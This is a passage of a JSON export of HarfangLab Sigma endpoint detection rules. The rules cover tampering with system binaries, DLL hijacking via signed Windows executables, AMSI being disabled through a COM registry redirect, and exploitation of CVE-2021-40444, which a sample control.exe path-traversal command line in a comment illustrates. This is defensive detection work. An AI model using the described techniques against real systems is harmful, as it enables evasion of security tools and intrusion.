'/usr/bin/python?.? /usr/bin/dnf-automatic'\n - 'dnf upgrade'\n - 'dnf upgrade --refresh'\n - 'dnf update'\n exclusion_rpm:\n ProcessImage: '/usr/bin/rpm'\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n exclusion_packagekitd:\n ProcessImage: '/usr/libexec/packagekitd'\n exclusion_flatpak:\n ProcessImage: '/usr/libexec/flatpak-system-helper'\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n\n exclusion_hurukai:\n ProcessImage: '/opt/hurukai-agent/bin/hurukai'\n\n exclusion_systemd:\n ProcessImage: '/usr/lib/systemd/systemd'\n ProcessCommandLine|startswith: '/sbin/init'\n\n exclusion_usrmerge:\n - ProcessCommandLine: '/usr/bin/perl /usr/lib/usrmerge/convert-usrmerge'\n - ProcessParentCommandLine: '/usr/bin/perl /usr/lib/usrmerge/convert-usrmerge'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_docker:\n ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/dockerd-ce'\n - '/usr/local/bin/dockerd'\n - '/snap/docker/*/bin/dockerd'\n\n exclusion_initramfs:\n - ProcessParentCommandLine|contains:\n - '/sbin/mkinitramfs'\n - '/usr/sbin/mkinitramfs'\n - ProcessGrandparentCommandLine|contains:\n - '/sbin/mkinitramfs'\n - '/usr/sbin/mkinitramfs'\n\n exclusion_containerd:\n - ProcessImage:\n - '/usr/bin/containerd'\n - '/snap/microk8s/*/bin/containerd'\n - ProcessAncestors|contains: '|/usr/bin/runc|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_prelink:\n ProcessImage: '/usr/sbin/prelink'\n\n exclusion_qemu:\n ProcessImage: '/usr/bin/qemu-*-static'\n ProcessParentImage: '/usr/bin/qemu-*-static'\n\n exclusion_kaniko:\n ProcessImage: '/kaniko/executor'\n\n exclusion_microdnf:\n ProcessImage: '/usr/bin/microdnf'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_container:\n ProcessImage: '/usr/bin/buildah'\n\n exclusion_shim:\n ProcessParentCommandLine|startswith: '/usr/bin/containerd-shim-runc-v2 -namespace'\n\n exclusion_buildah:\n ProcessCommandLine|startswith: 'storage-untar / /'\n\n exclusion_pamac:\n ProcessImage: '/usr/bin/pamac-daemon'\n\n exclusion_timeshift:\n ProcessImage: '/usr/bin/rsync'\n ProcessAncestors|contains: '|/usr/bin/timeshift|'\n\n exclusion_pum_worker:\n ProcessCommandLine|startswith:\n - '/usr/bin/python? -Estt /usr/local/psa/admin/sbin/pum_worker '\n - '/usr/libexec/platform-python -Estt /usr/local/psa/admin/sbin/pum_worker '\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b39c44fa-4f06-491f-a0bd-53f39cb7219e",
"rule_name": "Suspicious Modification of System Binaries",
"rule_description": "Detects a suspicious modification of a system binary, such as ls, ssh or bash.\nAdversaries may try to modify system binaries to steal credentials, setup persistence or provide a remotely accessible backdoor.\nIt is recommended to ensure that the process writing to those binaries is a legitimate installer and that the new file isn't malicious.\n",
"rule_creation_date": "2024-06-19",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1036.005",
"attack.t1554"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b3afbd61-7d79-49a8-bc4e-716776c05d21",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601668Z",
"creation_date": "2026-03-23T11:45:34.601672Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601679Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ie4ushowi.yml",
"content": "title: DLL Hijacking via IE4USHOW.exe\nid: b3afbd61-7d79-49a8-bc4e-716776c05d21\ndescription: |\n Detects potential Windows DLL Hijacking via IE4USHOW.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'IE4USHOWIE.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b3afbd61-7d79-49a8-bc4e-716776c05d21",
"rule_name": "DLL Hijacking via IE4USHOW.exe",
"rule_description": "Detects potential Windows DLL Hijacking via IE4USHOW.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b3baaf0d-46b7-451f-a695-6acea23a6bca",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080181Z",
"creation_date": "2026-03-23T11:45:34.080183Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080187Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.sonicwall.com/en-us/2023/03/asyncrat-variant-includes-cryptostealer-capabilites/",
"https://twitter.com/M_haggis/status/1679561130438713344",
"https://attack.mitre.org/techniques/T1562/001/",
"https://attack.mitre.org/techniques/T1546/015/"
],
"name": "t1562_001_com_hijacking_amsi_registry.yml",
"content": "title: AMSI Registry COM Object Modified\nid: b3baaf0d-46b7-451f-a695-6acea23a6bca\ndescription: |\n Detects the modification of the registry value related to the Microsoft Defender Component Object Model (COM) object for AMSI.\n An adversary with administrative rights can disable the Antimalware Scan Interface (AMSI) by overriding the Microsoft Defender COM object and make it point to a DLL that does not exist.\n Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities.\n It is recommended to ensure that process has legitimate reasons to perform this action.\nreferences:\n - https://blog.sonicwall.com/en-us/2023/03/asyncrat-variant-includes-cryptostealer-capabilites/\n - https://twitter.com/M_haggis/status/1679561130438713344\n - https://attack.mitre.org/techniques/T1562/001/\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2024/02/05\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1562.006\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1546.015\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject|endswith: '\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32\\(Default)'\n\n exclusion_legitimate:\n Details:\n - '%windir%\\system32\\amsi.dll'\n - '?:\\windows\\system32\\amsi.dll'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b3baaf0d-46b7-451f-a695-6acea23a6bca",
"rule_name": "AMSI Registry COM Object Modified",
"rule_description": "Detects the modification of the registry value related to the Microsoft Defender Component Object Model (COM) object for AMSI.\nAn adversary with administrative rights can disable the Antimalware Scan Interface (AMSI) by overriding the Microsoft Defender COM object and make it point to a DLL that does not exist.\nAdversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities.\nIt is recommended to ensure that process has legitimate reasons to perform this action.\n",
"rule_creation_date": "2024-02-05",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1546.015",
"attack.t1562.001",
"attack.t1562.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b3c805a2-724f-46bf-9027-9913a4dcea34",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082245Z",
"creation_date": "2026-03-23T11:45:34.082248Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082254Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_colorcpl.yml",
"content": "title: DLL Hijacking via colorcpl.exe\nid: b3c805a2-724f-46bf-9027-9913a4dcea34\ndescription: |\n Detects potential Windows DLL Hijacking via colorcpl.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'colorcpl.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ColorAdapterClient.dll'\n - '\\colorui.dll'\n - '\\IPHLPAPI.DLL'\n - '\\mscms.dll'\n - '\\PROPSYS.dll'\n - '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b3c805a2-724f-46bf-9027-9913a4dcea34",
"rule_name": "DLL Hijacking via colorcpl.exe",
"rule_description": "Detects potential Windows DLL Hijacking via colorcpl.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b3e570a5-4349-42f9-a6d2-c2ce464e61bd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592855Z",
"creation_date": "2026-03-23T11:45:34.592859Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592867Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_chkntfs.yml",
"content": "title: DLL Hijacking via chkntfs.exe\nid: b3e570a5-4349-42f9-a6d2-c2ce464e61bd\ndescription: |\n Detects potential Windows DLL Hijacking via chkntfs.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'chkntfs.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\DEVOBJ.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b3e570a5-4349-42f9-a6d2-c2ce464e61bd",
"rule_name": "DLL Hijacking via chkntfs.exe",
"rule_description": "Detects potential Windows DLL Hijacking via chkntfs.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b3f72539-195c-43f0-9b1a-d3ed3f8dbc89",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608449Z",
"creation_date": "2026-03-23T11:45:34.608452Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608460Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444",
"https://success.trendmicro.com/solution/000288999",
"https://attack.mitre.org/techniques/T1203/",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1566/"
],
"name": "t1203_microsoft_mshtml.yml",
"content": "title: Microsoft MSHTML Remote Code Execution CVE-2021-40444 Vulnerability Exploited\nid: b3f72539-195c-43f0-9b1a-d3ed3f8dbc89\ndescription: |\n Detects a potential exploitation of the Microsoft MSHTML Remote Code Execution Vulnerability (CVE-2021-40444).\n An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine.\n The attacker would then have to convince the user to open the malicious document, triggering unwanted code execution.\n It is recommended to analyze the code executed by control.exe as well as the opened document to look for malicious content.\nreferences:\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444\n - https://success.trendmicro.com/solution/000288999\n - https://attack.mitre.org/techniques/T1203/\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1566/\ndate: 2021/09/14\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.initial_access\n - attack.t1203\n - attack.t1204.002\n - attack.t1566\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2021-40444\n - classification.Windows.Exploit.MSHTML\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n Image|endswith: '\\control.exe'\n ParentImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\POWERPNT.EXE'\n selection_2:\n # \"C:\\Windows\\System32\\control.exe\" \".cpl:../../../AppData/Local/Temp/Low/championship.inf\",\n Image|endswith: '\\control.exe'\n CommandLine|contains: '../'\n ParentImage|endswith: '\\iexplore.exe'\n\n exclusion_input:\n CommandLine:\n - '?:\\Windows\\SysWOW64\\control.exe input.dll'\n - '?:\\Windows\\system32\\control.exe input.dll'\n - '?:\\windows\\SysWOW64\\control.exe SYSTEM'\n - '?:\\windows\\system32\\control.exe SYSTEM'\n\n condition: (selection_1 and not exclusion_input) or selection_2\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b3f72539-195c-43f0-9b1a-d3ed3f8dbc89",
"rule_name": "Microsoft MSHTML Remote Code Execution CVE-2021-40444 Vulnerability Exploited",
"rule_description": "Detects a potential exploitation of the Microsoft MSHTML Remote Code Execution Vulnerability (CVE-2021-40444).\nAn attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine.\nThe attacker would then have to convince the user to open the malicious document, triggering unwanted code execution.\nIt is recommended to analyze the code executed by control.exe as well as the opened document to look for malicious content.\n",
"rule_creation_date": "2021-09-14",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1204.002",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b4429290-fb41-4135-9038-d778706c2f2b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587394Z",
"creation_date": "2026-03-23T11:45:34.587397Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587405Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tabcal.yml",
"content": "title: DLL Hijacking via tabcal.exe\nid: b4429290-fb41-4135-9038-d778706c2f2b\ndescription: |\n Detects potential Windows DLL Hijacking via tabcal.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tabcal.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\davclnt.dll'\n - '\\DEVOBJ.dll'\n - '\\drprov.dll'\n - '\\HID.DLL'\n - '\\NInput.dll'\n - '\\ntlanman.dll'\n - '\\p9np.dll'\n - '\\propsys.dll'\n - '\\windows.storage.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b4429290-fb41-4135-9038-d778706c2f2b",
"rule_name": "DLL Hijacking via tabcal.exe",
